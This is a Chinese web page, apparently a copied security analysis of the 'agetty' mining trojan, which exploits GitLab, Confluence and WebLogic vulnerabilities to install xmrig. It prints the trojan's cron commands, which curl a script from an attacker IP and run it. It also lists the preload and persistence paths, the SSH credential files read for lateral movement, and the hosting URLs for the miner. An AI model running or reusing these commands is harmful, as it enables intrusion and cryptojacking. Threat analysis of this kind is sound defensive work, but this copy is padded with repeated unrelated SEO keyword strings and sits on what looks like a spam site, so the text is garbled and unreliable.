主页 > imtoken最新版app > 挖矿木马攻击

挖矿木马攻击

imtoken最新版app 2023-05-20 06:06:35

木马程序简介

近日，360安全大脑检测到一款名为agetty的挖矿木马，该木马利用GitLab远程命令执行漏洞（CVE-2021-22205）进行攻击。挖矿过程，最终交付xmrig挖矿程序获利。

分析木马内容

agetty挖矿木马利用以下漏洞进行攻击：

挖矿机配置_传奇永恒挖矿电脑配置_etc挖矿配置

序号漏洞名称漏洞编号

1个

Atlassian Confluence 远程代码执行漏洞

CVE-2021-26084

2个

etc挖矿配置_挖矿机配置_传奇永恒挖矿电脑配置

GitLab ExifTool 远程命令执行漏洞

CVE-2021-22205

3个

WebLogic远程代码执行漏洞

CVE-2020-14882

使用成功后来自：9091/view/userBehavior/.reporter/1.sh

下载恶意脚本1.sh并执行。

1、脚本首先清除各种竞争挖矿木马家族。

传奇永恒挖矿电脑配置_挖矿机配置_etc挖矿配置

2、然后将定时下载执行1.sh恶意脚本写入定时任务。

挖矿机配置_etc挖矿配置_传奇永恒挖矿电脑配置

3、同时在设备上搜索config.json挖矿配置文件etc挖矿配置，将里面的用户名替换成agetty木马自己的钱包地址etc挖矿配置，以此来将别人的挖矿收益据为己有。

etc挖矿配置_传奇永恒挖矿电脑配置_挖矿机配置

4、根据系统位数，下载木马文件并保存到/tmp/.gvfsd-metadata、/tmp/.seapplet并执行。

挖矿机配置_传奇永恒挖矿电脑配置_etc挖矿配置

agetty挖矿木马还会在/.ssh/config、.bash_history、/.ssh/known_hosts等文件中搜索SSH凭证进行横向移动。

传奇永恒挖矿电脑配置_挖矿机配置_etc挖矿配置

同时将木马嵌入的恶意so文件释放到/usr/local/lib/v.so，通过/etc/ld.so.preload.timed任务预加载

0 */5 * * * curl -fsSL -k http://111.85.159.55:9091/view/userBehavior/.reporter/1.sh -O /tmp/1.sh \\n

挖矿机配置_etc挖矿配置_传奇永恒挖矿电脑配置

写入 /etc/cron.d/root 文件；

定时任务

0 */5 * * * curl -fsSL -k http://111.85.159.55:9091/view/userBehavior/.reporter/1.sh -O /tmp/1.sh;bash /tmp/1.sh\\n

写入 /var/spool/cron/root、/var/spool/cron/crontabs/root 文件。

此外，/usr/local/lib/v.so还hook了fopen、fopen64、lstat、open、readdir、rmdir、unlink、unlinkat等函数，过滤掉.mate-terminal、ld.so.preload、v。这样信息就达到了隐藏自己的目的。

挖矿机配置_传奇永恒挖矿电脑配置_etc挖矿配置

根据agetty木马的钱包地址，我们还链接到了另一个样本0978fcab87c342330b7d34e6b8709124。 xmrig矿机和config.json配置文件分别托管在：

https://test123123123fdsafds.coding.net/p/test/d/test/git/raw/master/agetty

https://test123123123fdsafds.coding.net/p/test/d/test/git/raw/master/config.json

钱包当前在不同矿池的算力和收益如下：

挖矿机配置_传奇永恒挖矿电脑配置_etc挖矿配置

传奇永恒挖矿电脑配置_挖矿机配置_etc挖矿配置

主页 > imtoken最新版app > 挖矿木马攻击

挖矿木马攻击

相关文章